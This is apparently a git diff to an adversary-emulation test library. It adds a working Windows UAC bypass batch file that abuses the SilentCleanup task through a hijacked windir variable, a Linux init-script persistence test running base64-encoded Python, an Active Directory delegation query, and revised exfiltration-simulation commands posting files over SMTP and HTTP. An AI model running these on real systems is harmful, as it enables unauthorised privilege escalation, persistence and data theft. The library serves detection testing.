diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e84bab59..0e530577 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -118,6 +118,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -215,6 +216,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -618,6 +620,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index e3a45879..5d54166f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -85,6 +85,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -151,6 +152,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -436,6 +438,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3a916e39..a9ae5a7c 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -227,6 +227,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -417,6 +418,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -1119,6 +1121,7 @@
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+ - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6433b60d..5b6382dc 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -178,6 +178,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -308,6 +309,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -818,6 +820,7 @@
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+ - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index af7d14dd..69c30c6a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -10120,6 +10120,31 @@ privilege-escalation:
'
name: command_prompt
elevation_required: true
+ - name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: "#{file_path}\n"
+ name: command_prompt
+ elevation_required: false
T1574.012:
technique:
external_references:
@@ -19315,6 +19340,31 @@ defense-evasion:
'
name: command_prompt
elevation_required: true
+ - name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: "#{file_path}\n"
+ name: command_prompt
+ elevation_required: false
T1218.003:
technique:
external_references:
@@ -28887,11 +28937,9 @@ defense-evasion:
description: SMTP Server IP Address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
- command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027
- Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
- -SmtpServer #{smtp_server}"
+ command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
+ -Attachments #{input_file} -SmtpServer #{smtp_server}
'
name: powershell
@@ -28911,9 +28959,8 @@ defense-evasion:
description: Destination IP address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
- command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
'
name: powershell
@@ -49382,6 +49429,49 @@ discovery:
'
name: command_prompt
+ - name: Enumerate Active Directory for Unconstrained Delegation
+ auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+ description: |
+ Attackers may attempt to query for computer objects with the UserAccountControl property
+ 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+ More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain FQDN
+ type: String
+ default: contoso.com
+ uac_prop:
+ description: UAC Property to search
+ type: String
+ default: 524288
+ dependencies:
+ - description: 'PowerShell ActiveDirectory Module must be installed
+
+'
+ prereq_command: |
+ Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+ }
+ Catch {
+ exit 1
+ }
+ get_prereq_command: |
+ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+ } else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+ }
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
+ -Server #{domain}
+
+'
T1069.002:
technique:
external_references:
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 74a09cdb..9f34ff74 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -203,7 +203,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
```powershell
-"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
```
@@ -234,7 +234,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
```powershell
-Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
```
diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
index 4288d3ae..7210e5af 100644
--- a/atomics/T1027/T1027.yaml
+++ b/atomics/T1027/T1027.yaml
@@ -109,7 +109,7 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
- input_file:
+ input_file:
description: Path of the XLSM file
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
@@ -125,10 +125,9 @@ atomic_tests:
description: SMTP Server IP Address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
command: |
- "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
name: powershell
- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
@@ -147,8 +146,7 @@ atomic_tests:
description: Destination IP address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
command: |
- Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
name: powershell
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 2b80197a..f39060c1 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -24,6 +24,8 @@ Commands such as net user /domain and net group /domain
@@ -344,4 +346,59 @@ net user administrator /domain
+
+
+
+## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation
+Attackers may attempt to query for computer objects with the UserAccountControl property
+'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | Domain FQDN | String | contoso.com|
+| uac_prop | UAC Property to search | String | 524288|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: PowerShell ActiveDirectory Module must be installed
+##### Check Prereq Commands:
+```powershell
+Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+}
+Catch {
+ exit 1
+}
+```
+##### Get Prereq Commands:
+```powershell
+if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+} else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+}
+```
+
+
+
+
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index d8f3a3f4..61822ffb 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -69,7 +69,7 @@ atomic_tests:
name: powershell
- name: Adfind -Listing password policy
auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
supported_platforms:
@@ -93,7 +93,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Admins
auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
supported_platforms:
@@ -117,7 +117,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory User Objects
auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -141,7 +141,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Exchange AD Objects
auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -173,3 +173,44 @@ atomic_tests:
command: |
net user administrator /domain
name: command_prompt
+
+- name: Enumerate Active Directory for Unconstrained Delegation
+ auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+ description: |
+ Attackers may attempt to query for computer objects with the UserAccountControl property
+ 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+ More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain FQDN
+ type: String
+ default: contoso.com
+ uac_prop:
+ description: UAC Property to search
+ type: String
+ default: 524288
+ dependencies:
+ - description: |
+ PowerShell ActiveDirectory Module must be installed
+ prereq_command: |
+ Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+ }
+ Catch {
+ exit 1
+ }
+ get_prereq_command: |
+ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+ } else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+ }
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md
index c9bfec54..6f2f4e4b 100644
--- a/atomics/T1543.002/T1543.002.md
+++ b/atomics/T1543.002/T1543.002.md
@@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni
- [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service)
+- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service)
+
@@ -75,4 +77,67 @@ systemctl daemon-reload
+
+
+
+## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.
+This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+
+```bash
+cat > /etc/init.d/T1543.002 << EOF
+#!/bin/bash
+### BEGIN INIT INFO
+# Provides : Atomic Test T1543.002
+# Required-Start: $all
+# Required-Stop :
+# Default-Start: 2 3 4 5
+# Default-Stop:
+# Short Description: Atomic Test for Systemd Service Creation
+### END INIT INFO
+python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
+EOF
+
+chmod +x /etc/init.d/T1543.002
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
+systemctl enable T1543.002
+systemctl start T1543.002
+
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
+systemctl daemon-reload
+systemctl restart T1543.002
+```
+
+#### Cleanup Commands:
+```bash
+systemctl stop T1543.002
+systemctl disable T1543.002
+rm -rf /etc/init.d/T1543.002
+systemctl daemon-reload
+```
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: System must be Ubuntu ,Kali OR CentOS.
+##### Check Prereq Commands:
+```bash
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+echo Please run these atomic tests from Ubuntu ,Kali OR CentOS.
+```
+
+
+
+
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md
index 98064122..597dc756 100644
--- a/atomics/T1548.002/T1548.002.md
+++ b/atomics/T1548.002/T1548.002.md
@@ -28,6 +28,8 @@ Another bypass is possible through some lateral movement techniques if credentia
- [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe)
+- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task)
+
@@ -314,4 +316,43 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En
+
+
+
+## Atomic Test #9 - Bypass UAC using SilentCleanup task
+Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+For example, we can set the windir registry kye to: "cmd /k REM "
+
+And forcefully run SilentCleanup task:
+
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+#{file_path}
+```
+
+
+
+
+
+
diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml
index 5186a236..619b5f6a 100644
--- a/atomics/T1548.002/T1548.002.yaml
+++ b/atomics/T1548.002/T1548.002.yaml
@@ -162,3 +162,29 @@ atomic_tests:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
name: command_prompt
elevation_required: true
+- name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: |
+ #{file_path}
+ name: command_prompt
+ elevation_required: false
diff --git a/atomics/T1548.002/src/T1548.002.bat b/atomics/T1548.002/src/T1548.002.bat
new file mode 100644
index 00000000..d873b527
--- /dev/null
+++ b/atomics/T1548.002/src/T1548.002.bat
@@ -0,0 +1,8 @@
+@echo off
+mode 18,1
+color FE
+reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul
+timeout /t 2 >nul
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
+timeout /t 3 >nul
+reg delete "HKCU\Environment" /v "windir" /F
\ No newline at end of file
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 7d1c8c5d..409c774d 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -704,3 +704,5 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319
